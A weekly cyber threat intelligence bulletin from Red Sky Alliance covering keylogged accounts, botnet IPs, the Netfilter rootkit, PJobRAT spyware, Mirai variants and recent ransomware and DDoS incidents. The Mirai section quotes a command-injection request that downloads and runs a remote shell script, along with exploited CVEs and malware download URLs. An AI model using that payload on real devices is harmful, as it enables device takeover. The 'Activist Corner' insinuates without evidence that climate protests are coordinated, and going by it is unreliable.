activity summary - week ending 2 july 2021

TLP GREEN

© 2021 Red Sky Alliance Corp. All rights reserved. 1

INTELLIGENCE REPORT: ALL SECTOR CYBER THREATS SER. NO.: IR-21-183-001

Activity Summary - Week Ending 2 July 2021:

• Red Sky Alliance identified 19,270 connections from new unique IP addresses

• Analysts identified 2,543 new IP addresses participating in various Botnets

• 13 unique email accounts compromised with keyloggers were Observed

• Netfilter

• PJobRAT Spyware

• Mirai Knockoffs

• Salvation Army Hit

• Conti & Canada

• DragonForce / Israeli Banking

• Fancy Lazarus attempts an attack on German Banks - Denied

COMPROMISED EMAIL ACCOUNTS

Below are the Top 10 Keylogger emails and the Top Attacker Servers (C2) observed on 2 July 2021 through our

Red Sky Alliance proprietary collection and analysis data. On 28 June 2021, Red Sky Alliance observed 13

unique email accounts compromised with keyloggers which were used to log into mostly personal accounts.

Keylogger: Email Times Seen Attacker Server (C2) Times Seen

[email protected] 12 [email protected] 60





[email protected] 7

[email protected] 6

[email protected] 2

[email protected] 2

[email protected] 2

Table 1: The top two keylogged emails are: [email protected] This is a Russian account possibly spoofing vad-vmd-05m of

Continental Hydraulics in Minnesota US. This name is associated with several social media accounts. Regardless, it is keylogged

and should be avoided. [email protected] Luci Baron is a young person who may have been keylogged. This is a Gmail

account. These and all this week’s keylogged email should be black listed. Call us for a full list.

TLP GREEN


Table 2: Top observed Attacker Server (C2), is being used by attackers to maintain communications with compromised systems

within a target network. [email protected] and [email protected] have been compromised for many months.

This attack server should be blacklisted. Contact Red Sky Alliance for more C2 indicators.

COMPROMISED (C2) IP’S

MALWARE ACTIVITY

On 28 June 2021, Red Sky Alliance identified 19,270 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.

On 28 June 2021, analysts identified 2,543 new IP addresses participating in various botnets (call for full .csv

Blacklists, below are only a small sampling of botnet trackers)

IP Contacts

135.181.213.169 65

185.158.115.77 24

129.213.62.230 15

54.39.29.64 14

191.101.217.20 13

147.147.220.127 12

147.147.220.9 11

95.25.211.239 10

62.210.205.65 10

18.189.7.149 10

Malware Variant Times Seen

sality 17082

corkow 1168

sykipot 243

loki 221

shiz 201

koobface 148

wcry_ransom 123

maudi 102

poweliks 89

betabot 84

135.181.213.169 – Hetzner Online Gmbh, address:

Industriestrasse 25, D-91710, Gunzenhausen Germany, ASN:

AS24940, CIDR: 135.181.0.0/16; 185.158.115.77 -- Vnukovo

Ip Server Llc, address: st. Shabolovka, 34, building 3

115419 Moscow Russia, ASN: AS44812, CIDR:

185.158.115.0/24

Top 10 Malware Variant and number of contacts.

Sality and Corkow has consistently remain the top

variants, followed by Sykipot malware.

TLP GREEN


Recorded Future Top 5 Threat Actors and Malware for 06 30 2021 (rankings change daily)

First_ Seen Botnet Attribution Infected Host’s IPv4 Address

2021-06-24T21:02:34 SOCKS4 proxy|port:4145 1.0.243.175



2021-06-20T07:53:03 HTTP proxy|port:8080 1.2.189.45



2021-06-22T06:51:49 HTTP proxy|port:8080 1.20.191.168





Blacklist data is crucial in proactive network security as they allow companies to defend from network attacks

before they are targeted, giving them the opportunity to prevent attacks - versus reacting to an internal attack.

Our blacklists provide cyber professionals insight into trending attacks and helps identify sources of malicious

emails, malicious websites, and other sources for malware infection. Please contact Red Sky Alliance for full

.csv blacklist data subscription.

This past week, there has been continued cyber-attacks seen throughout the World. The results of a malicious

attack can put you out of business – prepare today.

TLP GREEN


MALICIOUS CYBER TRENDS 1

Netfilter—Rootkit Signed With a Valid Digital Certificate – FortiGuard Labs is aware of reports of a recently discovered rootkit named Netfilter. Netfilter, discovered by security researcher Karsten Hahn, utilizes signed certificates to evade detection. Signed malware containing valid digital certificates are often used by threat actors to evade detection as they are trusted by antivirus and other endpoint security software. Because a company/organization is vetted by a certificate authority (CA) before the issuance of a digital certificate, operating systems and antivirus software treat files signed with these certificates as clean, which ultimately allows the file(s) to operate with impunity. What makes this latest discovery unique is that the signed certificates are valid Microsoft signed signatures. Details are not available at this time as to how these certificates belonging to Microsoft were used to sign the malware. Fortinet customers currently running the latest definition sets are protected against known Netfilter samples. Find more details in out technical FAQ here.

Signatures: W64/Agent.AOD!tr W64/MalDrv.AOD!tr W32/Agent.ADFG!tr W64/Agent.L!tr W32/Agent!tr W32/PossibleThreat W32/UPXHack.A PossibleThreat.FAI

Indicator(s):

• 63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0

• d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe

• 4a229ab274e364df92cc46ecbc9faab32f7b0955dab982658313f2faf9410863

• a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac4

• bbc58fd69ce5fed6691dd8d2084e9b728add808ffd5ea8b42ac284b686f77d9a

• bff9b75ae2eea49a765f79d9c67c997edb6c67a2cc720c6187dd2f67980acab7

• f83c357106a7d1d055b5cb75c8414aa3219354deb16ae9ee7efe8ee4c8c670ca

Web Filtering - Indian Military Personnel being targeted using PJobRAT Spyware – Researchers discovered an ongoing attack that is being conducted relating to the Indian military. The malware is named PJobRAT. The malware structure is based on Android. The first attack using this malware was in January 2021 though the RAT family is speculated to have first appeared in December 2019. The attacker only focuses on Indian personnel who have a military background. The malware "PJobRAT" is masked as the current version of the Marriage and Indian Dating application, Trendbanter. After some analysis of the malware, it was found that the malware only uploads specific suffixes in mobile phones, which includes the PDF, PPT, DOC, XLS, DOCX, PPTX, and XLSX type of files. Through the auxiliary function of Android, the malware will be able to retrieve personal information on conversation messages from WhatsApp.

The features of this malware include:

• Recording • Upload SMS • Upload address book • Upload image file • Upload audio files • Upload a list of external storage files • Update phone number

1 Fortinet Intel Blog, 06 25 2021

TLP GREEN


• Upload video file • Upload a list of installed apps • Upload Wi-Fi, geographic location, and other information

The malware is using only two types of communication: Firebase Cloud Messaging (FCM) and HTTP. So, once it runs on a mobile phone, it begins the execution process. The malware starts to execute the activities mentioned above. It will gather all the information from the victim and send it to the attacker through the command-and-control server. The data pushes via the FCM message push function. FortiGuard Labs has classified all related IOCs.

Indicator(s):

• 144[.]91[.]65[.]101/senewteam2136/mainfiles/file_handler[.]php • 144[.]91[.]65[.]101/senewteam2137/mainfiles/file_handler[.]php • 144[.]91[.]65[.]101 • helloworld[.]bounceme[.]net/axbxcxdx123/test[.]php • helloworld[.]bounceme[.]net

Mirai Knockoffs / Fortinet Research Blog – Five years have passed since the source code of MIRAI IoT malware was released to the public (2016). This led to numerous copycats, creating their own tactics of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same. IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. These hackers seek to exploit known—and sometimes even zero-day—vulnerabilities to increase their chances of gaining access. And once they do, malicious binaries are downloaded and executed that make the device part of a zombie network that could then be instructed to participate in a Distributed Denial-of-Service (DDoS) attack that could cause a service outage to an unfortunate target. Some threat actors even sell these new botnets as a service. Researchers have been closely monitoring the current state of the IoT botnet threat landscape through the perspective of an IoT device with the help of a honeypot system.

So, where are these attacks come from? To simulate what it would be like for a new IoT device to be connected to the Internet for the first time, Fortinet set up a fresh honeypot system to capture what kinds of attacks it would receive. This honeypot was designed to be vulnerable to telnet credential brute force attacks. The statistics in this article were taken from a three-week period. On average, this honeypot system received around 200 attacks per day, ultimately recording nearly 4700 telnet connections in just three weeks. The identify of nearly 4000 of those attacks and connect them to a Mirai-related malware Figure 1. Unique telenet source IPs per country

https://www.fortinet.com/resources/cyberglossary/iot-security?utm_source=blog&utm_campaign=iot-security

TLP GREEN


family was teen. Since this honeypot does not execute any of the downloaded binaries, most of the attacks keep retrying until their malware has executed in the system. By removing IP duplicates, the actual number of attack sources was obtained and is broken down in the next table. Top IoT Malware Variants - Mirai variant authors use unique strings or tokens in their binaries that are used to verify whether SSH or Telnet commands were successfully executed in the device—although this could also be used by the threat actors to advertise their malware or, in some cases, simply as a placeholder for novelty messages.

The figure below shows a sequence of commands that the SORA Mirai variant executes immediately after gaining access to a device. These strings have been heavily used by researchers over time to classify variants. However, there are cases where variants may use different tokens but turn out to be the same malware function-wise—and are even operated by the same threat actor. In such cases, analyzing the actual binary being downloaded into the device would greatly help further define the number of existing variants.

Based on the attacks received by the honeypot, the following table shows the top

10 variants we were able to identify. The Enigmatic “Hajime - Hajime was titled as the successor to the first generation of Mirai. Built on the same principle and goals as of its predecessor, it tries to propagate to IOT devices by means of brute-forcing credentials using a password list of common default device passwords. However, unlike Mirai, Hajime utilizes a decentralized peer-to-peer network to issue commands to its bots. This makes it much harder to locate the Command-and-Control (C2) server for a takedown. Aside from its sophisticated bot network communication, it is also one of the most mysterious variants due to its vague intentions. Commands sent to Hajime bots are in the form of structured messages that are passed along in the peer-to-peer network. One of these commands instruct bots to download and execute binaries, internally called "modules". Only the spreading module has been observed being served in the wild. No attack or disruptive modules have been observed, and Hajime has never been associated with any disruption attacks. Additionally, part of its behavior is to block access to ports that are commonly targeted by other IoT malware, thereby inadvertently (or not) somewhat protecting the infected device from further infections.

And it delivers the following message to the device’s terminal: “Just a white hat, securing some systems. Important messages will be signed like this! Hajime Author. Contact CLOSED Stay sharp!”

Figure 3. Sample shell commands executed by a SORA bot

Figure 2. Top ten identified variants

https://www.fortinet.com/blog/industry-trends/fighting-the-evolution-of-malware?utm_source=blog&utm_campaign=fighting-the-evolution-of-malware

TLP GREEN


It was only a matter of time before some speculated that Hajime might be the work of a real vigilante.

SYLVEON Coming Out of Retirement? What surprised Fortinet was the appearance of the SYLVEON variant on the table. In mid-2019 there was a 14-year old European IoT malware author that went by the name of “Light The Sylveon” and “Light The Leafeon”. Researchers took quick look at the decrypted strings of one of the binaries we captured, the word “Leafeon” was found, creating speculation that this might be the author’s comeback.

“Light the Sylveon” co-created the destructive SILEX IoT malware, whose goal was to render vulnerable devices inoperable by running destructive commands–very similar to BrickerBot. From the malware authors’ perspective, based on a message embedded in the malware’s binary, this was to “prevent skids to flex their skidded botnet.” Eventually, the “Light The Sylveon” author announced through a post on his twitter account that he was going to abandon the project. Unlike SILEX, however, SYLVEON is a conventional IoT malware that was clearly

based on the Mirai source code with some added attacks. Interestingly enough, the group greek.Helios and a certain Thar3seller, which were a group previously associated with other IoT malware campaigns, currently claim to be the authors of this variant. The relationship between these different authors is still unclear. What we are certain about is that this variant is being actively operated, as also shown by recently updated binaries found in one of its download servers.

Figure 4. Function name list found

in a SYLVEON binary.

Figure 5. Open directory hosting SYLVEON variant

TLP GREEN


SORA - The Surviving Member of the Wicked Family. It is interesting to see Mirai variants that were authored by the threat actor known as Wicked that we covered three years ago. These variants include Owari, Omni, Wicked, and SORA. Based on an interview at that time, the author stated he was going to focus on Owari and Omni while abandoning the other two variants, including SORA. Based on our observations, it seems that SORA has more successfully survived than its siblings.

Mirai Variant MANGA Actively Updates its List of Targeted Vulnerabilities - Aside from the honeypot, we have also been monitoring Mirai variants from other sources. In particular, we have been closely monitoring the developments of the MANGA variant because it is one of the most active in terms of adding new exploit vectors to its list.

A few weeks ago, it added several more exploits, two of which are recent:

OptiLink ONT1GEW GPON Remote Code Execution (formTracert function)

CVE-2021-1498 (Cisco HyperFlex HX Remote Code Execution)

Figure 6. Strings found in a SYLVEON binary

https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1498

TLP GREEN


CVE-2021-31755 (Tenda Router AC11 Remote Code Execution)

(Unidentified target)

Figure 7. Sample request

Here is a list of other vulnerabilities this malware variant tries to exploit:

Vulnerability Description

CVE-2021-22986 F5 iControl REST Remote Code Execution

CVE-2009-4490 mini_httpd 1.18 Escape Sequence

CVE-2018-10088 XiongMai uc-httpd Buffer Overflow

CVE-2020-28188 TerraMaster TOS Remote Code Execution

CVE-2020-29557 D-Link DIR-825 Buffer Overflow

CVE-2020-25506 D-Link DNS-320 Remote Code Execution

CVE-2021-22502 Micro Focus OBR Remote Code Execution

CVE-2021-27561/CVE-2021-27562 Yealink DM (Device Management) Remote Code Execution

CVE-2021-22991 F5 BIG-IP Buffer Overflow

VisualDoor(2021-01-29) SonicWall SSL-VPN Remote Code Execution

Unknown 2 key parameter on /cgi-bin/login.cgi leading to Remote Code Execution Sample request: POST /cgi-bin/login.cgi HTTP/1.1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 key=';`cd /tmp; wget http://{REDACTED IP}/lolol.sh; curl -O http://{REDACTED IP}/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;`;#

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31755

https://support.f5.com/csp/article/K03009991

https://nvd.nist.gov/vuln/detail/CVE-2009-4490#:~:text=CVE%2D2009%2D4490%20Detail&text=mini_httpd%201.19%20writes%20data%20to,sequence%20for%20a%20terminal%20emulator.

https://nvd.nist.gov/vuln/detail/CVE-2018-10088





https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/

https://support.f5.com/csp/article/K56715231

https://www.exploit-db.com/exploits/49499

TLP GREEN


Analyst conclusion - As the number of installed IoT devices continues to explode, especially given the current lack of security standards available to protect them, IoT will be a hotbed for malware operations for the foreseeable future, as we have demonstrated in this article. And interestingly, Mirai variants are still very active in terms of attack and development.

IOCs: MANGA

Files (SHA256) 25fcefa76d1752b40b33f353332ddb48b3bae529f0af24347ffeffc5e1acd5cd 5312cb57d8c38ab349a9d67db65c66a733758cb29eb118c958ede11a98322c8a 6075c917e2b25ff2def7cdb3019e0ad725a02387c9e1e83cb6514bd410c8f928 fd2aed69644ff8edcc501945ca5e83d548c6c346d3e92c922eeb3f5da03f9b8d 626e1a247045dff09c4b6aa5de8d9b9d1d385846306a359587f42b60d4413258 68601bae31381d2205dd16df1f2aff52592f9a9aad71ea5f60f68321c6aea579 40066f30b72b4184b33e834712832879f8814ddaf56c71f33bbaacb890c350f0 51ffd3c3e1b10b629692b3b1120c777388ae73c61469bb2926d2a70a457ea14d fee1a5ceea21f14b60f0d632a2889bf3ef81f45eb783e53ada44b9b2f8e4a4a 7df6c4d3bc4f528c5928e3ef09feb532e3407f893af02c16437e669390d6a09f eb64753c578138157eeff8ba1087a94538f1337bd4c6d09ac26806cb12ff69c1 ef57d97bffb2ef7a435fe6668d0aba12196cd91ee1cd3d5446ad525995b76b8d c9845823a32b9b5ff59f76771c90e4f23c8f94e9013051797cfd4efdf43c4d4f 1a2bc7e97c73efbbbe4a7ad0f577c2b3585f1fe15a3fdb82bd79f13906d838d0 ca9965127cfdae9e2d8b228af0ab691589ac27cc5ca17a3377de2e8551b64f9f 49e5ba121c216146cdcf63ebade1853a3710fa266f8c456e3dcee0565e6bdbb1 1bb9bda36b1d2a8963e5a2687ce4645a02805ad0ccb74a0b234cdb9503fdd8e3 f19c64746eddcd33daa30df9c9f282863ad05b22e2f143382f0ab18547cd6497 ec7f7a791e7bca70b5143bbe9064124ae05cdfc13a3c7ab295b6f555eda1ed7d

Download URLs

• http[:]//212.192.241.72/bins/dark.mpsl

• http[:]//212.192.241.72/bins/dark.arm5



• http[:]//212.192.241.72/bins/dark.x86

• http[:]//212.192.241.72/bins/dark.ppc

• http[:]//212.192.241.72/bins/dark.mips

Hajime

Files (SHA256) a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Download URLs http[:]//121.121.122.176:29641/.i http[:]//121.162.45.6:38828/.i http[:]//125.227.193.220:38674/.i http[:]//130.164.183.217:62624/.i http[:]//14.42.160.123:19634/.i http[:]//147.234.71.142:7011/.i http[:]//171.232.247.121:63812/.i http[:]//171.247.233.69:36829/.i http[:]//175.115.103.118:8450/.i http[:]//178.116.76.54:20060/.i http[:]//183.108.201.171:32745/.i http[:]//184.82.56.195:58027/.i http[:]//187.233.194.166:3181/.i http[:]//187.37.198.126:14552/.i

TLP GREEN


http[:]//189.132.235.210:43064/.i http[:]//189.173.97.200:41775/.i http[:]//190.18.221.214:51789/.i http[:]//2.45.4.24:50436/.i http[:]//201.105.177.84:25768/.i http[:]//210.99.125.95:56779/.i http[:]//211.107.151.26:26593/.i

Sample commands after gaining access:

SYLVEON

Files (SHA256) 2bdd553ad6485d11844c6cb68ae63f083c7f2ee6029f128a1521427e9a29aad5 311ac01e395d96f8017ef95dfa9ee8f00aa527e02cfcd207de371e04e5aed023 4a4b8fdbe2cff3547e6d808226d34cf6059d9160326326d3b90d851e602035d8 7edb2ff320e99a1b92c7fa51dcd485edbc15eb4d23520ee26ed0d42600a733a1 4bbf2dab9cce066bab887e0058150157f0417d6dceca64025ce2127a8eb584b0 208ae3086c769098f1a55ac6d88fb760571010c16f4a0e25c98ee0d33d4bdbbc fac943c6173cf183e53bea76d4f6b07dbb455ec3dc98dda71164267fc7e1dbb4

Download URL:

• http[:]//31.210.20.138/uwu/arm6

• http[:]//31.210.20.138/uwu/ppc

• http[:]//31.210.20.138/arm6

• http[:]//31.210.20.138/sh4

• http[:]//45.153.203.219/uwu/arm6

• http[:]//45.95.169.110/bins/m68k

Sample commands after gaining access:

GLOBAL TRENDS:

UK / Salvation Army (Charity) - The Salvation Army (SA) in England has been hit by a ransomware attack. It is

reported the Christian charity organization is negotiating with the attackers over the stolen data. UK media is

reporting the Salvation Army first noticed the attack around a month ago, which is believed to have affected a

London data center used by the charity.2 A Salvation Army spokesperson confirmed the attack took place and

that the UK’s Information Commissioners Office (ICO) has been informed, “We are investigating an IT incident

affecting a number of our corporate IT systems. We have informed the Charity Commission and the ICO, are

2 https://www.infosecurity-magazine.com/news/salvation-army-ransomware-attack/

TLP GREEN


also in dialogue with our key partners and staff and are working to notify any other

relevant third parties.” The SA said that none of its services for vulnerable people

had been affected. As of 1 July, there is no further information about the cyber-

attack, such as the attackers' identity or the data accessed. As of this same date,

no data has appeared on any known ransomware gang sites. The Salvation Army

staff and volunteers have been advised by authorities to keep a close watch for

any unusual banking activity from their accounts or suspicious communication

they receive. This cyber-attack has further demonstrated that no organization is

safe when it comes to ransomware and must be prepared to face attacks at any

time. A systems engineering manager at Infoblox said, “This latest attack on the

UK arm of the Salvation Army shows that ransomware is growing in sophistication and that actors are getting

bolder. No organization is off-limits, even those in the charity sector. When it comes to ransomware, the only

truly effective approach is prevention. If an unprotected system gets attacked, there is no way to guarantee the

retrieval or decryption of data. Mitigating risk before an attack can happen is the most effective defense an

organization can have. Security solutions – such as those that leverage DNS – that can interrupt the malware's

attempt to connect to the command-and-control server, as well as frequent and robust backups, are key. All

organizations - regardless of size or sector - should expect ransomware attacks and prepare accordingly.”

The CEO at CybSafe, added, “Sadly, this latest incident is just one of a spate of ransomware attacks to have

occurred over recent months. Schools, healthcare services and charities such as the Salvation Army are being

increasingly targeted by malicious actors who view them as soft targets. Given the growing frequency of these

attacks, it’s never been more important for organizations and individuals to take the necessary measures to protect

themselves online. We need to move beyond basic awareness training and more seriously consider the human

aspect of cybersecurity. As these attacks become more sophisticated, they also become more personalized, and

therefore an approach towards cybersecurity must mirror this if organizations and individuals are to successfully

fend off such threats.”

Conti & Canada - Three more Canadian companies have been listed on a ransomware group’s website as being

victims of their attacks. The firms are an internet provider in southwestern Ontario, a engineering firm in eastern

Ontario and an insurance broker in Quebec. The Conti ransomware group says it has stolen data from all three,

and as proof posted copies of what it says are some of the files. The Conti group has a reputation of not bluffing.

The three are either small or medium sized-firms, more evidence that ransomware gangs and their affiliate

partners, who actually do the targeting, are not just after big

companies.3 There were lots of headlines earlier this year

when the US, Canada and other countries blamed a Russian-

based threat group for being behind the compromise of the

SolarWinds Orion network management platform. Despite all

the attention the group is still active, according to Microsoft.

The company said Friday that the group, which it calls

Nobelium, has recently been trying to break into targeted

organizations in Canada, the US, Germany and other

countries. Although most attempts were unsuccessful,

Microsoft admitted that the computer of one of its customer support staff was hacked. Stolen customer information

3 https://www.itworldcanada.com/article/cyber-security-today-june-28-2021-more-canadian-firms-hit-with-ransomware-nobelium-

group-attempting-to-infiltrate-canadian-and-u-s-firms-dreamhost-data-fumble-and-more/455193

TLP GREEN


from that hack was used by Nobelium to try to get into their organizations. Nobelium mainly targets IT-related

companies and governments but has also been seen going after think tanks and financial services firms. In

addition to using stolen information to try to get into organizations, Nobelium uses password spray and brute-force

password attacks.

DragonForce / Israeli Banking - The Israeli banking system was attacked last weekend by hundreds of

Malaysian hackers in an attempt to damage the state’s financial apparatus. The anti-Israel group of hackers

called “DragonForce” who carried out the attack claimed they had damaged the entire system; the hackers posted

screenshots that appeared to show the collapse of the computers on Israeli banking sites. However, it is estimated

that in many cases, these were fake pics. The attack was carried out in three waves, was aimed at harming the

services from the banks’ websites, and “even to try and film them through a distributed denial of service (DDoS)

attack.” The final wave of attacks, launched in the late hours of 25 June was the most intense and difficult of them

all, according to the Hebrew-language Ynet site. “This is an urgent call for all hackers around the world to unite

again and start a campaign against Israel,” the group’s Telegram group said. Hundreds of thousands of members

joined via Twitter, Telegram, Facebook and a forum.

Against the background of Israel’s activities in Gaza, the group launched the current attack a few days before its

planned date, distributing the Internet addresses of Israeli banks and inviting hackers who hated Israel from all

over the world to participate in the attack. In Israel, cyber defense personnel prepared for the attack and reportedly

prevented most of the attempts. A source at one of the banks told Ynet that when the bank’s cyber defense

personnel managed to block the Internet addresses of the attackers, they saw a message on the screen as if the

bank’s website had crashed. “Some of the time they posted all kinds of ‘successes’ [but] it was a ‘Photoshop'”

the source said. During a DDoS attack, the attackers launch

thousands of calls simultaneously with the aim of causing the targeted

site to crash. According to estimates by experts who participated in

the defense of the banks, the scope of the attack reached

approximately 200 megabytes per second which is a considerable

volume. The purpose of this type of attack is to exploit the high

number of attackers to collapse the computer systems, rather than to

infiltrate to obtain information. A source in the Israeli banking system

said the targeted load of inquiries led to a brief slowdown and denial

of service at all banks’ sites.

One of the attacks was aimed at the Bank of Israel. “From time to time attempts are made to carry out DDoS

attacks on the Bank of Israel’s external website and on websites of government ministries,” the Bank of Israel said

in a statement. “Such attempts are routinely blocked without damage to the website; thus in any case such

attempts do not affect the bank’s systems.” Other banks issued similar statements, saying the attempted attack

was “unsuccessful and no damage to any service or process was identified.”

DragonForce recently published one file that allegedly contained the names and addresses of hundreds of

thousands of Israeli students and another that contained a list of Israelis’ passports as well as other personal data.

In this case, however, experts in Israel’s cyber defense system said such attempts as those on the banks’ websites

are “routinely recognized and stopped. In this case too, the banks were prepared and all attempts were stopped

without harming the service or any process.”

Germany / Banking Attack - German authorities allegedly stopped a cyberattack on a data service provider used

by federal agencies and pushed back on a report that a broad assault targeted critical infrastructure and banks.

TLP GREEN


The attempted attack was quickly handled and the impact on service was “very marginal,” Interior Ministry

spokesman told reporters on 30 June. He added that it was likely criminally motivated. German media cited

unidentified intelligence sources saying that a hacker group linked to the Kremlin had carried out an attack on

German infrastructure and the country’s banking system. The group was identified as “Fancy Lazarus” after

earlier referencing “Fancy Bear,” a group controlled by Russia’s GRU military intelligence agency. German

officials have not detected an increase in cyber activities in recent days. Germany’s BSI Federal Cyber Security

Authority denied Twitter reports and said that the agency had no knowledge of the attack, which media sources

said may be revenge for international sanctions leveled on Russia and Belarus.

Proofpoint Inc., a cybersecurity firm said this month in its blog that Fancy Lazarus previously identified themselves

as Fancy Bear and has been involved in an increasing number of so-called distributed denial-of-service attacks,

including against the energy, financial and insurance industries. Such attacks attempt to overload systems by

flooding the target with superfluous requests from multiple sources. Proofpoint said there was no known

connection to the Fancy Bear group that has been labeled an advanced, persistent threat.

A spokesperson for Deutsche Bank AG and Commerzbank AG and for

lobby groups for savings, cooperative and private lenders said they

were looking into the attempted cyber-attack. With elections looming

in September and Chancellor Angela Merkel poised to step aside,

German authorities are on the alert for the potential for interference

from Russia, both in terms of cyberattacks on infrastructure as well as

disinformation campaigns. The Green party’s chancellor candidate, Annalena Baerbock, has become a target

given her strong opposition to the almost-completed Nord Stream 2 pipeline that would channel gas from Russia

to Germany.

CYBER THREAT ANALYSIS CENTER (CTAC) 1 July 2021

Dark Web Collection/Analysis

Bank of Israel – Hits: 183

The Bank of Israel is the central bank of Israel. The bank's headquarters is in

the Kiryat HaMemshala section of Jerusalem, with a branch office in Tel Aviv.

The primary objective of the Bank of Israel is to maintain price stability and

the stability of the financial system in Israel.

TLP GREEN


Activist Corner 4 5 6

4 The Overton window is the range of policies politically acceptable to the mainstream population at a given time. 5https://www.democracynow.org/2021/6/29/headlines/an_overt_political_blockade_minnesota_police_barricade_line_3_pipeline_

protest_camp 6 https://patch.com/massachusetts/waltham/pipeline-protesters-stage-sit-enbridge-office-waltham

Two members of the US Congress are seen yuking it up with a

Sunrise Movement (SM) youth reporter in the halls of Congress.

This podcast is to further promote the Green New Deal, Civilian

Climate Corps (CCC) and its unionization of the proposed

workforce. These titles are a knock off of the New Deal and CCC

of the US Depression era (1930’s) programs under President F.

Roosevelt. Sunrise Movement is a US political action youth

organization that advocates political action on climate change.

After political actions, they turned their focus on working towards

shifting the Overton window on climate policy to center the

environmental program known as the Green New Deal. Together

with Justice Democrats and Alexandria Ocasio-Cortez, the group is

now highly organized activist group.

Last Monday, MN sheriff’s deputies barricaded access to an

encampment of environmental activists who are resisting

construction of the Enbridge Line 3 tar sands pipeline, which has

the backing of the Biden administration. Officers towed several of

the activists’ cars and made several arrests throughout the day. An

attorney for the Indigenous-led protesters called the move, “nothing

less than an overt political blockade.” Over in Waltham MA,

protesters opposing a compressor and pipeline project are staging

a sit in at the Waltham offices of Enbridge. Hmmmm. Coincidence?

The protesters oppose the company's Weymouth compressor and

Line 3 Pipeline projects, according to a tweet from an environmental

reporter. Police arrived around noon to get the protesters out of the

building for trespassing, according to the tweet. Last week marked

the end of a global week of action against insurers of Canada’s

Trans Mountain pipeline and its expansion project. The protests,

calling on its insurers to cut ties with the federally owned pipeline,

spanned 25 actions across four continents. Another coincidence?

Last Sunday, London Police arrested 23 members of the activist

group Extinction Rebellion during a “Free the Press” day of protest

against media corruption in the United Kingdom. The highlight of

the Sunday action was when protesters dumped seven tons of

horse manure at the doorsteps of the British tabloid Daily Mail and

defaced its entrance with spray paint. Protesters sent a message

to four billionaires who they say control 68% of the UK’s print media

to “cut the buillsh*t!” and demanding “an end to media corruption

that suppresses the truth from the public for profit.”

activity summary - week ending 2 july 2021

Documents